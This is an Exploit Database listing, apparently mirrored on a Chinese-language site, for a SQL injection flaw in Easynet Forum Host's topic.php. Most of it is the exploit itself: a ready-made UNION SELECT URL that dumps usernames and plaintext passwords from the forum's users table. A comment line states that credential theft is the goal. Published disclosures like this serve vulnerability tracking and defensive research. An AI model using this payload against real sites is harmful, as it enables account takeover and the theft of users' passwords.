Easynet Forum Host – ‘topic.php’ SQL Injection

• Exploit Database
• 11 阅读

• 作者： Yakir Wizman
  日期： 2010-03-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11701/

• # Exploit Title: Easynet Forum Host (topic.php) SQL Injection Vulnerbility
  # Date: 05/04/2008
  # Author: Pr0T3cT10n
  # Software Link: http://www.easynet4u.com/forum
  # Version: all
  # Tested on: all
  # CVE:
  # Code:
  //------------------------------------------------
  // Easynet Forum Host SQL Injection Vulnerbility
  //------------------------------------------------
  // Discovered by: Pr0T3cT10n, pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com>
  // Discovered on: 5 April 2008
  // SCRIPT DOWNLOAD: N/A
  //------------------------------------------------
  // SCRIPT SITE: http://www.easynet4u.com/forum
  //------------------------------------------------
  // Description: retrive users username and plaintext password.
  //------------------------------------------------
  // NOTE / TIP: After you exploit the site please press CTRL+A :)
  // EXPLOIT: http://www.server.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0
  //------------------------------------------------